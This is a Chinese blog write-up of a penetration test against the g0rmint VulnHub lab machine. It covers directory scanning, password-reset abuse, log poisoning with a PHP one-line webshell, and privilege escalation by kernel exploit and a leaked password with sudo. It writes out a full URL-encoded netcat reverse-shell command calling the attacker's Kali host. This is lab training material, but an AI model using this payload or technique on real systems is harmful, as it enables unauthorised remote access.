kali渗透综合靶机(十四)--g0rmint靶机

一、靶机下载

下载链接:https://www.vulnhub.com/entry/g0rmint-1,214/

二、g0rmint靶机搭建

将下载好的靶机环境,用VMware导入即可使用,文件->打开
在这里插入图片描述
在这里插入图片描述
导入到合适位置即可,默认是C盘,成功导入虚拟机之后,打开即可
在这里插入图片描述
在这里插入图片描述

三、攻击过程

kali IP:192.168.212.6
靶机IP:192.168.212.10

1、主机发现

在这里插入图片描述

2、端口扫描

方法一:
在这里插入图片描述
方法二:
在这里插入图片描述

3、端口服务识别

在这里插入图片描述

4、漏洞查找与利用

访问网站
在这里插入图片描述
扫描目录
在这里插入图片描述
发现
在这里插入图片描述
访问
在这里插入图片描述
查看页面源码,发现备份目录
在这里插入图片描述
在这里插入图片描述
使用dirb 扫描http://192.168.212.10/g0rmint/s3cretbackupdirect0ry/,发现http://192.168.212.10/g0rmint/s3cretbackupdirect0ry/info.php
在这里插入图片描述
访问http://192.168.10.173/g0rmint/s3cretbackupdirect0ry/info.php
在这里插入图片描述
下载备份文件
在这里插入图片描述
查看网站代码,发现用户名、密码、邮箱,尝试登录失败
在这里插入图片描述
在这里插入图片描述
查看login.php,发现登录失败的时候会生成一个日志文件(调用addlog函数)
在这里插入图片描述
查看addlog函数,发现日志写在.php文件中,尝试在登录邮箱处插入php语句,从而任意执行代码
在这里插入图片描述
在登录邮箱处插入php一句话木马,点击提交,登录失败跳转到登录页面
最后发现是fwrite($fh, file_get_contents(“dummy.php”) . “
\n”);写入了一个session判断
在这里插入图片描述
所以需要先解决登录的问题。
查看reset.php,可以看到只要知道了一个存在的邮箱和用户名,就可以重置密码为一个时间值的哈希,尝试了demo和一些常用邮箱用户名之后,发现似乎并没有这个用户
在这里插入图片描述
在全文搜索email关键字, 可以在一个css文件中看到用户的名字和邮箱
在这里插入图片描述
成功重置后,界面右下角也给出了对应的时间,遂能算出相应的哈希值,使用在线的hash加密,去加密成功后的hash值前20位最为密码的值
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
重置密码
在这里插入图片描述
访问到生成的log文件,因在代码审计中发现登录失败日志路径
在这里插入图片描述
访问http://192.168.212.10/g0rmint/s3cr3t-dir3ct0ry-f0r-l0gs/2020-03-29.php
(由于时间戳原因,日期需提前一天)
在这里插入图片描述
在登陆的时候邮箱处插入一句话木马,然后访问对应日志,提交POST参数即可执行任意PHP代码。
在这里插入图片描述
在这里插入图片描述
然后将shell反弹到我的kali中来
在post中输入:注意需要url编码
cmd=%60rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20%2Di%202%3E%261%7Cnc%20192.168.212.6%201234%20%3E%2Ftmp%2Ff%3B%60%3B
在这里插入图片描述
kali监听
在这里插入图片描述

提权方式一

查看内核版本
在这里插入图片描述
kali查看是否有对应版本的漏洞
在这里插入图片描述
在kali编译好脚本,然后目标用wget下载,执行,获得管理员权限
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

提权方式二

在1的基础上
在/var/www目录下又发现网站备份文件,解压发现db.sql
在这里插入图片描述
在这里插入图片描述
查看db.sql发现用户noman以及密码
在这里插入图片描述
在这里插入图片描述
密码解压
在这里插入图片描述
用户名/密码:noman/tayyab123
尝试用noman用户登录,失败,发现/etc/passwd中有g0rmint,尝试用noman的密码登录,成功登录进去
在这里插入图片描述
用sudo -l 查看当前用户是否属于sudo组,然后sudo -i 直接获得管理员权限
在这里插入图片描述

总结

1、信息收集、端口扫描、服务识别
2、目录扫描、发现敏感信息备份文件
3、登录密码的地方暂时突破不了,尝试在重置密码的地方寻找突破口、发现有用信息
4、进行代码审计,发现日志文件的后缀是php文件,这时可以尝试在登录的地方接入一句话,然后就写入到日志中。
5、getshell、提权

更多web安全工具与存在漏洞的网站搭建源码,收集整理在知识星球。
在这里插入图片描述

  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值